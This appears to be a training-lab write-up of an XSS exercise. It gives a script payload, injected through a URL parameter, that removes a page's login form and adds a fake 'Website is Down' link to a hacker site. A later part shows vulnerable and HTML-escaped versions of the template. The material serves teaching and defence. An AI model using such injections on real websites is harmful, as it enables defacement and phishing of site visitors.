Task 5: Social Engineering
In this task, we have to do some social engineering with XSS. The task is pretty simple: remove the form element and add a new element with the text “Website is Down! Please visit SecurityTube.net”.
To complete the task, we start by investigating the source code to find our target area, which is the form tag. Copy and URL-encode the code provided below, then paste it after the url parameter in the URL bar.
<script>
var frmcon = document.forms[0];
frmcon.parentNode.removeChild(frmcon);
var a = document.createElement('A');
var atxt = document.createTextNode('Website is Down! Please visit SecurityTube.net');
a.setAttribute("href", "http://www.the-hacker-site.com");
a.appendChild(atxt);
document.getElementsByTagName('div')[3].appendChild(a);
</script>
The first two lines of code remove the form element and the next four lines create a new element. In my case I create an anchor (link) with the <a> tag, assign it the string value ‘Website is Down! Please visit SecurityTube.net’ and link it to some hacker's site. The last line appends the newly created child to the fourth div element (figured out manually).
Replacing the form child node with another does not seem to work for me, maybe due to browser issues; that is why I create a new child node and append it to the div tag.
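The injection above only works because the page writes the url parameter into its HTML as markup. The following is an added example, not code from the lab or from the original post: it contrasts a hypothetical template that concatenates the parameter with one that HTML-encodes it. The function names, the surrounding markup and the sample request are assumptions made for illustration.

```javascript
// Added example. Assumption: the page echoes the "url" query parameter
// into its HTML response. Names and markup here are hypothetical.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};

// Encode a value for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Read the (percent-decoded) "url" parameter from a raw query string.
function getUrlParam(query) {
  return new URLSearchParams(query).get('url') || '';
}

// Vulnerable: the parameter is concatenated into the page as markup,
// so any <script> element it carries becomes part of the document.
function renderVulnerable(query) {
  return '<p>Requested URL: ' + getUrlParam(query) + '</p>';
}

// Hardened: the same template, but the parameter is encoded first,
// so the browser displays it as text instead of parsing it.
function renderHardened(query) {
  return '<p>Requested URL: ' + escapeHtml(getUrlParam(query)) + '</p>';
}

// Constructed sample request carrying a harmless marker script.
const SAMPLE_QUERY =
  'url=' + encodeURIComponent('<script>document.title="injected"</script>');

console.log(renderVulnerable(SAMPLE_QUERY));
console.log(renderHardened(SAMPLE_QUERY));
```

With the hardened template the script never runs, so the form stays in place and no link can be appended to the page.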